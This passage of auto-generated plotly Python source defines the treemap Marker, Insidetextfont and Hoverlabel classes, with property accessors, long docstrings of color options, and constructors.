the axis `type` is "date", it should be a date
string, like date data. If the axis `type` is
"category", it should be a number, using the
scale where each category is assigned a serial
number from zero in the order it appears.
tickangle
Sets the angle of the tick labels with respect
to the horizontal. For example, a `tickangle`
of -90 draws the tick labels vertically.
tickcolor
Sets the tick color.
tickfont
Sets the color bar's tick label font
tickformat
Sets the tick label formatting rule using d3
formatting mini-languages which are very
similar to those in Python. For numbers, see:
https://github.com/d3/d3-3.x-api-
reference/blob/master/Formatting.md#d3_format
And for dates see:
https://github.com/d3/d3-3.x-api-
reference/blob/master/Time-Formatting.md#format
We add one item to d3's date formatter: "%{n}f"
for fractional seconds with n digits. For
example, *2016-10-13 09:15:23.456* with
tickformat "%H~%M~%S.%2f" would display
"09~15~23.46"
tickformatstops
A tuple of plotly.graph_objects.treemap.marker.
colorbar.Tickformatstop instances or dicts with
compatible properties
tickformatstopdefaults
When used in a template (as layout.template.dat
a.treemap.marker.colorbar.tickformatstopdefault
s), sets the default property values to use for
elements of
treemap.marker.colorbar.tickformatstops
ticklen
Sets the tick length (in px).
tickmode
Sets the tick mode for this axis. If "auto",
the number of ticks is set via `nticks`. If
"linear", the placement of the ticks is
determined by a starting position `tick0` and a
tick step `dtick` ("linear" is the default
value if `tick0` and `dtick` are provided). If
"array", the placement of the ticks is set via
`tickvals` and the tick text is `ticktext`.
("array" is the default value if `tickvals` is
provided).
tickprefix
Sets a tick label prefix.
ticks
Determines whether ticks are drawn or not. If
"", this axis' ticks are not drawn. If
"outside" ("inside"), this axis' are drawn
outside (inside) the axis lines.
ticksuffix
Sets a tick label suffix.
ticktext
Sets the text displayed at the ticks position
via `tickvals`. Only has an effect if
`tickmode` is set to "array". Used with
`tickvals`.
ticktextsrc
Sets the source reference on plot.ly for
ticktext .
tickvals
Sets the values at which ticks on this axis
appear. Only has an effect if `tickmode` is set
to "array". Used with `ticktext`.
tickvalssrc
Sets the source reference on plot.ly for
tickvals .
tickwidth
Sets the tick width (in px).
title
plotly.graph_objects.treemap.marker.colorbar.Ti
tle instance or dict with compatible properties
titlefont
Deprecated: Please use
treemap.marker.colorbar.title.font instead.
Sets this color bar's title font. Note that the
title's font used to be set by the now
deprecated `titlefont` attribute.
titleside
Deprecated: Please use
treemap.marker.colorbar.title.side instead.
Determines the location of color bar's title
with respect to the color bar. Note that the
title's location used to be set by the now
deprecated `titleside` attribute.
x
Sets the x position of the color bar (in plot
fraction).
xanchor
Sets this color bar's horizontal position
anchor. This anchor binds the `x` position to
the "left", "center" or "right" of the color
bar.
xpad
Sets the amount of padding (in px) along the x
direction.
y
Sets the y position of the color bar (in plot
fraction).
yanchor
Sets this color bar's vertical position anchor
This anchor binds the `y` position to the
"top", "middle" or "bottom" of the color bar.
ypad
Sets the amount of padding (in px) along the y
direction.
Returns
-------
plotly.graph_objs.treemap.marker.ColorBar
"""
return self["colorbar"]
@colorbar.setter
def colorbar(self, val):
self["colorbar"] = val
# colors
# ------
@property
def colors(self):
"""
Sets the color of each sector of this trace. If not specified,
the default trace color set is used to pick the sector colors.
The 'colors' property is an array that may be specified as a tuple,
list, numpy array, or pandas Series
Returns
-------
numpy.ndarray
"""
return self["colors"]
@colors.setter
def colors(self, val):
self["colors"] = val
# colorscale
# ----------
@property
def colorscale(self):
"""
Sets the colorscale. Has an effect only if colorsis set to a
numerical array. The colorscale must be an array containing
arrays mapping a normalized value to an rgb, rgba, hex, hsl,
hsv, or named color string. At minimum, a mapping for the
lowest (0) and highest (1) values are required. For example,
`[[0, 'rgb(0,0,255)'], [1, 'rgb(255,0,0)']]`. To control the
bounds of the colorscale in color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a palette
name string of the following list: Greys,YlGnBu,Greens,YlOrRd,B
luered,RdBu,Reds,Blues,Picnic,Rainbow,Portland,Jet,Hot,Blackbod
y,Earth,Electric,Viridis,Cividis.
The 'colorscale' property is a colorscale and may be
specified as:
- A list of colors that will be spaced evenly to create the colorscale.
Many predefined colorscale lists are included in the sequential, diverging,
and cyclical modules in the plotly.colors package.
- A list of 2-element lists where the first element is the
normalized color level value (starting at 0 and ending at 1),
and the second item is a valid color string.
(e.g. [[0, 'green'], [0.5, 'red'], [1.0, 'rgb(0, 0, 255)']])
- One of the following named colorscales:
['aggrnyl', 'agsunset', 'algae', 'amp', 'armyrose', 'balance',
'blackbody', 'bluered', 'blues', 'blugrn', 'bluyl', 'brbg',
'brwnyl', 'bugn', 'bupu', 'burg', 'burgyl', 'cividis', 'curl',
'darkmint', 'deep', 'delta', 'dense', 'earth', 'edge', 'electric',
'emrld', 'fall', 'geyser', 'gnbu', 'gray', 'greens', 'greys',
'haline', 'hot', 'hsv', 'ice', 'icefire', 'inferno', 'jet',
'magenta', 'magma', 'matter', 'mint', 'mrybm', 'mygbm', 'oranges',
'orrd', 'oryel', 'peach', 'phase', 'picnic', 'pinkyl', 'piyg',
'plasma', 'plotly3', 'portland', 'prgn', 'pubu', 'pubugn', 'puor',
'purd', 'purp', 'purples', 'purpor', 'rainbow', 'rdbu', 'rdgy',
'rdpu', 'rdylbu', 'rdylgn', 'redor', 'reds', 'solar', 'spectral',
'speed', 'sunset', 'sunsetdark', 'teal', 'tealgrn', 'tealrose',
'tempo', 'temps', 'thermal', 'tropic', 'turbid', 'twilight',
'viridis', 'ylgn', 'ylgnbu', 'ylorbr', 'ylorrd']
Returns
-------
str
"""
return self["colorscale"]
@colorscale.setter
def colorscale(self, val):
self["colorscale"] = val
# colorssrc
# ---------
@property
def colorssrc(self):
"""
Sets the source reference on plot.ly for colors .
The 'colorssrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorssrc"]
@colorssrc.setter
def colorssrc(self, val):
self["colorssrc"] = val
# depthfade
# ---------
@property
def depthfade(self):
"""
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This option is
unavailable when a `colorscale` is present, defaults to false
when `marker.colors` is set, but otherwise defaults to true.
When set to "reversed", the fading direction is inverted, that
is the top elements within hierarchy are drawn with fully
saturated colors while the leaves are faded towards the
background color.
The 'depthfade' property is an enumeration that may be specified as:
- One of the following enumeration values:
[True, False, 'reversed']
Returns
-------
Any
"""
return self["depthfade"]
@depthfade.setter
def depthfade(self, val):
self["depthfade"] = val
# line
# ----
@property
def line(self):
"""
The 'line' property is an instance of Line
that may be specified as:
- An instance of plotly.graph_objs.treemap.marker.Line
- A dict of string/value properties that will be passed
to the Line constructor
Supported dict properties:
color
Sets the color of the line enclosing each
sector. Defaults to the `paper_bgcolor` value.
colorsrc
Sets the source reference on plot.ly for color
.
width
Sets the width (in px) of the line enclosing
each sector.
widthsrc
Sets the source reference on plot.ly for width
.
Returns
-------
plotly.graph_objs.treemap.marker.Line
"""
return self["line"]
@line.setter
def line(self, val):
self["line"] = val
# pad
# ---
@property
def pad(self):
"""
The 'pad' property is an instance of Pad
that may be specified as:
- An instance of plotly.graph_objs.treemap.marker.Pad
- A dict of string/value properties that will be passed
to the Pad constructor
Supported dict properties:
b
Sets the padding form the bottom (in px).
l
Sets the padding form the left (in px).
r
Sets the padding form the right (in px).
t
Sets the padding form the top (in px).
Returns
-------
plotly.graph_objs.treemap.marker.Pad
"""
return self["pad"]
@pad.setter
def pad(self, val):
self["pad"] = val
# reversescale
# ------------
@property
def reversescale(self):
"""
Reverses the color mapping if true. Has an effect only if
colorsis set to a numerical array. If true, `marker.cmin` will
correspond to the last color in the array and `marker.cmax`
will correspond to the first color.
The 'reversescale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["reversescale"]
@reversescale.setter
def reversescale(self, val):
self["reversescale"] = val
# showscale
# ---------
@property
def showscale(self):
"""
Determines whether or not a colorbar is displayed for this
trace. Has an effect only if colorsis set to a numerical array.
The 'showscale' property must be specified as a bool
(either True, or False)
Returns
-------
bool
"""
return self["showscale"]
@showscale.setter
def showscale(self, val):
self["showscale"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colorsis set
to a numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the default
palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or
mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here colors) or the
bounds set in `marker.cmin` and `marker.cmax` Has an
effect only if colorsis set to a numerical array.
Defaults to `false` when `marker.cmin` and
`marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmin`
must be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.cmin` and/or `marker.cmax` to be equidistant to
this point. Has an effect only if colorsis set to a
numerical array. Value should have the same units as
colors. Has no effect when `marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmax`
must be set as well.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
plotly.graph_objects.treemap.marker.ColorBar instance
or dict with compatible properties
colors
Sets the color of each sector of this trace. If not
specified, the default trace color set is used to pick
the sector colors.
colorscale
Sets the colorscale. Has an effect only if colorsis set
to a numerical array. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a
palette name string of the following list: Greys,YlGnBu
,Greens,YlOrRd,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,P
ortland,Jet,Hot,Blackbody,Earth,Electric,Viridis,Cividi
s.
colorssrc
Sets the source reference on plot.ly for colors .
depthfade
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This
option is unavailable when a `colorscale` is present,
defaults to false when `marker.colors` is set, but
otherwise defaults to true. When set to "reversed", the
fading direction is inverted, that is the top elements
within hierarchy are drawn with fully saturated colors
while the leaves are faded towards the background
color.
line
plotly.graph_objects.treemap.marker.Line instance or
dict with compatible properties
pad
plotly.graph_objects.treemap.marker.Pad instance or
dict with compatible properties
reversescale
Reverses the color mapping if true. Has an effect only
if colorsis set to a numerical array. If true,
`marker.cmin` will correspond to the last color in the
array and `marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is displayed for
this trace. Has an effect only if colorsis set to a
numerical array.
"""
def __init__(
self,
arg=None,
autocolorscale=None,
cauto=None,
cmax=None,
cmid=None,
cmin=None,
coloraxis=None,
colorbar=None,
colors=None,
colorscale=None,
colorssrc=None,
depthfade=None,
line=None,
pad=None,
reversescale=None,
showscale=None,
**kwargs
):
"""
Construct a new Marker object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Marker
autocolorscale
Determines whether the colorscale is a default palette
(`autocolorscale: true`) or the palette determined by
`marker.colorscale`. Has an effect only if colorsis set
to a numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the default
palette will be chosen according to whether numbers in
the `color` array are all positive, all negative or
mixed.
cauto
Determines whether or not the color domain is computed
with respect to the input data (here colors) or the
bounds set in `marker.cmin` and `marker.cmax` Has an
effect only if colorsis set to a numerical array.
Defaults to `false` when `marker.cmin` and
`marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmin`
must be set as well.
cmid
Sets the mid-point of the color domain by scaling
`marker.cmin` and/or `marker.cmax` to be equidistant to
this point. Has an effect only if colorsis set to a
numerical array. Value should have the same units as
colors. Has no effect when `marker.cauto` is `false`.
cmin
Sets the lower bound of the color domain. Has an effect
only if colorsis set to a numerical array. Value should
have the same units as colors and if set, `marker.cmax`
must be set as well.
coloraxis
Sets a reference to a shared color axis. References to
these shared color axes are "coloraxis", "coloraxis2",
"coloraxis3", etc. Settings for these shared color axes
are set in the layout, under `layout.coloraxis`,
`layout.coloraxis2`, etc. Note that multiple color
scales can be linked to the same color axis.
colorbar
plotly.graph_objects.treemap.marker.ColorBar instance
or dict with compatible properties
colors
Sets the color of each sector of this trace. If not
specified, the default trace color set is used to pick
the sector colors.
colorscale
Sets the colorscale. Has an effect only if colorsis set
to a numerical array. The colorscale must be an array
containing arrays mapping a normalized value to an rgb,
rgba, hex, hsl, hsv, or named color string. At minimum,
a mapping for the lowest (0) and highest (1) values are
required. For example, `[[0, 'rgb(0,0,255)'], [1,
'rgb(255,0,0)']]`. To control the bounds of the
colorscale in color space, use`marker.cmin` and
`marker.cmax`. Alternatively, `colorscale` may be a
palette name string of the following list: Greys,YlGnBu
,Greens,YlOrRd,Bluered,RdBu,Reds,Blues,Picnic,Rainbow,P
ortland,Jet,Hot,Blackbody,Earth,Electric,Viridis,Cividi
s.
colorssrc
Sets the source reference on plot.ly for colors .
depthfade
Determines if the sector colors are faded towards the
background from the leaves up to the headers. This
option is unavailable when a `colorscale` is present,
defaults to false when `marker.colors` is set, but
otherwise defaults to true. When set to "reversed", the
fading direction is inverted, that is the top elements
within hierarchy are drawn with fully saturated colors
while the leaves are faded towards the background
color.
line
plotly.graph_objects.treemap.marker.Line instance or
dict with compatible properties
pad
plotly.graph_objects.treemap.marker.Pad instance or
dict with compatible properties
reversescale
Reverses the color mapping if true. Has an effect only
if colorsis set to a numerical array. If true,
`marker.cmin` will correspond to the last color in the
array and `marker.cmax` will correspond to the first
color.
showscale
Determines whether or not a colorbar is displayed for
this trace. Has an effect only if colorsis set to a
numerical array.
Returns
-------
Marker
"""
super(Marker, self).__init__("marker")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Marker
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Marker"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import marker as v_marker
# Initialize validators
# ---------------------
self._validators["autocolorscale"] = v_marker.AutocolorscaleValidator()
self._validators["cauto"] = v_marker.CautoValidator()
self._validators["cmax"] = v_marker.CmaxValidator()
self._validators["cmid"] = v_marker.CmidValidator()
self._validators["cmin"] = v_marker.CminValidator()
self._validators["coloraxis"] = v_marker.ColoraxisValidator()
self._validators["colorbar"] = v_marker.ColorBarValidator()
self._validators["colors"] = v_marker.ColorsValidator()
self._validators["colorscale"] = v_marker.ColorscaleValidator()
self._validators["colorssrc"] = v_marker.ColorssrcValidator()
self._validators["depthfade"] = v_marker.DepthfadeValidator()
self._validators["line"] = v_marker.LineValidator()
self._validators["pad"] = v_marker.PadValidator()
self._validators["reversescale"] = v_marker.ReversescaleValidator()
self._validators["showscale"] = v_marker.ShowscaleValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("autocolorscale", None)
self["autocolorscale"] = autocolorscale if autocolorscale is not None else _v
_v = arg.pop("cauto", None)
self["cauto"] = cauto if cauto is not None else _v
_v = arg.pop("cmax", None)
self["cmax"] = cmax if cmax is not None else _v
_v = arg.pop("cmid", None)
self["cmid"] = cmid if cmid is not None else _v
_v = arg.pop("cmin", None)
self["cmin"] = cmin if cmin is not None else _v
_v = arg.pop("coloraxis", None)
self["coloraxis"] = coloraxis if coloraxis is not None else _v
_v = arg.pop("colorbar", None)
self["colorbar"] = colorbar if colorbar is not None else _v
_v = arg.pop("colors", None)
self["colors"] = colors if colors is not None else _v
_v = arg.pop("colorscale", None)
self["colorscale"] = colorscale if colorscale is not None else _v
_v = arg.pop("colorssrc", None)
self["colorssrc"] = colorssrc if colorssrc is not None else _v
_v = arg.pop("depthfade", None)
self["depthfade"] = depthfade if depthfade is not None else _v
_v = arg.pop("line", None)
self["line"] = line if line is not None else _v
_v = arg.pop("pad", None)
self["pad"] = pad if pad is not None else _v
_v = arg.pop("reversescale", None)
self["reversescale"] = reversescale if reversescale is not None else _v
_v = arg.pop("showscale", None)
self["showscale"] = showscale if showscale is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Insidetextfont(_BaseTraceHierarchyType):
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# colorsrc
# --------
@property
def colorsrc(self):
"""
Sets the source reference on plot.ly for color .
The 'colorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["colorsrc"]
@colorsrc.setter
def colorsrc(self, val):
self["colorsrc"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The plotly service (at https://plot.ly or on-
premise) generates images on a server, where only a select
number of fonts are installed and supported. These include
"Arial", "Balto", "Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old Standard TT", "Open
Sans", "Overpass", "PT Sans Narrow", "Raleway", "Times New
Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
str|numpy.ndarray
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# familysrc
# ---------
@property
def familysrc(self):
"""
Sets the source reference on plot.ly for family .
The 'familysrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|float|numpy.ndarray
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# sizesrc
# -------
@property
def sizesrc(self):
"""
Sets the source reference on plot.ly for size .
The 'sizesrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
"""
Construct a new Insidetextfont object
Sets the font used for `textinfo` lying inside the sector.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Insidetextfont
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
Returns
-------
Insidetextfont
"""
super(Insidetextfont, self).__init__("insidetextfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Insidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Insidetextfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import insidetextfont as v_insidetextfont
# Initialize validators
# ---------------------
self._validators["color"] = v_insidetextfont.ColorValidator()
self._validators["colorsrc"] = v_insidetextfont.ColorsrcValidator()
self._validators["family"] = v_insidetextfont.FamilyValidator()
self._validators["familysrc"] = v_insidetextfont.FamilysrcValidator()
self._validators["size"] = v_insidetextfont.SizeValidator()
self._validators["sizesrc"] = v_insidetextfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Hoverlabel(_BaseTraceHierarchyType):
# align
# -----
@property
def align(self):
"""
Sets the horizontal alignment of the text content within hover
label box. Has an effect only if the hover label text spans
more two or more lines
The 'align' property is an enumeration that may be specified as:
- One of the following enumeration values:
['left', 'right', 'auto']
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
Any|numpy.ndarray
"""
return self["align"]
@align.setter
def align(self, val):
self["align"] = val
# alignsrc
# --------
@property
def alignsrc(self):
"""
Sets the source reference on plot.ly for align .
The 'alignsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["alignsrc"]
@alignsrc.setter
def alignsrc(self, val):
self["alignsrc"] = val
# bgcolor
# -------
@property
def bgcolor(self):
"""
Sets the background color of the hover labels for this trace
The 'bgcolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["bgcolor"]
@bgcolor.setter
def bgcolor(self, val):
self["bgcolor"] = val
# bgcolorsrc
# ----------
@property
def bgcolorsrc(self):
"""
Sets the source reference on plot.ly for bgcolor .
The 'bgcolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["bgcolorsrc"]
@bgcolorsrc.setter
def bgcolorsrc(self, val):
self["bgcolorsrc"] = val
# bordercolor
# -----------
@property
def bordercolor(self):
"""
Sets the border color of the hover labels for this trace.
The 'bordercolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["bordercolor"]
@bordercolor.setter
def bordercolor(self, val):
self["bordercolor"] = val
# bordercolorsrc
# --------------
@property
def bordercolorsrc(self):
"""
Sets the source reference on plot.ly for bordercolor .
The 'bordercolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["bordercolorsrc"]
@bordercolorsrc.setter
def bordercolorsrc(self, val):
self["bordercolorsrc"] = val
# font
# ----
@property
def font(self):
"""
Sets the font used in hover labels.
The 'font' property is an instance of Font
that may be specified as:
- An instance of plotly.graph_objs.treemap.hoverlabel.Font
- A dict of string/value properties that will be passed
